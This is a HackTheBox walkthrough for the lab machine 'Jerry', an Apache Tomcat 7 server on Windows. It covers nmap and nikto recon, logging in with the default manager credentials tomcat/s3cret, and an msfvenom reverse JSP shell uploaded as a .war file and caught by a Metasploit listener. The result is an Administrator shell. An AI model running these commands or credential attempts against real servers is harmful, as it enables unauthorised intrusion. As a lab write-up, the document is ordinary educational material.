Jerry

Walkthrough


OS: JerryWindows
Difficulty: Easy
Points: 20
Release: 30 jun 2018
IP: 10.10.10.95
Jerry

0xL1NK#~ HackTheBox.eu


  1. Description
  2. Jerry was one of the easiest boxes i've done so far. It was very straight forward with no rabbit holes. Unfortunately there was no privilege escalation, as the user and root flag were together in the same file.

  3. Recon
    1. Nmap
    2. As always, we start out with some recon of the box. The default go to tool is Nmap to find open ports and their services:


      Used command:

      root@kali:~/Documents/htb/Jerry# nmap -sC -sV -oA jerry 10.10.10.95

      Output:

      Starting Nmap 7.60 ( https://nmap.org ) at 2018-11-09 21:18 CET Nmap scan report for 10.10.10.95 Host is up (0.044s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION style="color:yellow;">8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88

      As we can see, port 8080 is open, and is running Apache Tomcat 7.0.88. Surfing to the web page, we are presented with a default Tomcat page. Next, we want to enumerate the website for directories and/or possible vulnerabilities. A nice tool to do this with is Nikto.


    3. Nikto
    4. Used command:

      root@kali:~/Documents/htb/Jerry# nikto -h 10.10.10.95 -p 8080

      Output:

      - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.95 + Target Hostname: 10.10.10.95 + Target Port: 8080 + Start Time: 2018-11-09 21:31:42 (GMT1) --------------------------------------------------------------------------- + Server: Apache-Coyote/1.1 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0xW/21630 0x1525691762000 + OSVDB-39272: favicon.ico file identifies this server as: Apache Tomcat + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /examples/servlets/index.html: Apache Tomcat default JSP pages present. + OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. + Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat. + /host-manager/html: Default Tomcat Manager / Host Manager interface found + /manager/html: Tomcat Manager / Host Manager interface found (pass protected) + /manager/status: Tomcat Server Status interface found (pass protected) + 7605 requests: 0 error(s) and 14 item(s) reported on remote host + End Time: 2018-11-09 21:38:46 (GMT1) (424 seconds) --------------------------------------------------------------------------- + 1 host(s) tested

      Nikto found some default login credentials on 10.10.10.95:8080/manager/html

      Username: tomcat

      Password: s3cret


      With these credentials we got access to the Tomcat manager page, where we can upload .war files. We can use msfvenom to generate a .war shell that we can upload here.

  4. Exploitation
  5. After the shell is uploaded it can be executed, and it will connect back to our listener.

    1. Generating the shell
    2. Create the .war file with msfvenom. The shell we are going to use is a reverse JSP TCP shell.


      Command used:

      msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip> LPORT=<port> -f war > reverseshell.war

      The payload from the .war file will create a backdoor file inside it with a randomly generated string as a name. This is the file we're gonna browse to after the .war file is uploaded. After browsing to this file, the reverse connection will be established to our Kali machine. We can not browse to this file, if we do not know its name. We can run the following command to get the filename:

      Command used:

      root@kali:~/Documents/htb/Jerry# jar -xvf reverseshell.war

      Output:

      created: WEB-INF/ inflated: WEB-INF/web.xml inflated: djkwbjspxeqxnor.jsp

      According to the given output, the filename is djkwbjspxeqxnor.jsp


    3. Setting up our listener
    4. Next we want to set up our listener for the incoming connection. We will use Metasploit's multi/handler for this.


      Commands used:

      root@kali: msfconsole msf> use exploit multi/handler msf> set payload java/jsp_shell_reverse_tcp msf> set LHOST <local IP> msf> set LPORT <local port> msf> set ExitOnSession false msf> exploit -j

      The -j parameter will keep the connected session in the background.


    5. Upload the shell to Tomcat.
    6. Login with the default credentials on the Tomcat manager page, and upload your .war file.


    7. Execute the payload
    8. To execute the payload to connect back to our listener, we must browse to the .jsp file we generated in step 1. The URL to browse to will be:

      http://10.10.10.95:8080/<Name of .war file>/<Name of .jsp file> http://10.10.10.95:8080/reverseshell/djkwbjspxeqxnor.jsp

      Back on Kali, we will be presented with an Administrator shell. We can now read the file that will contain both user.txt and root.txt.

      C:\Users\Administrator\Desktop\flags>more "2 for the price of 1.txt"

** For more information, check out the extra links and sources. **

50URC35: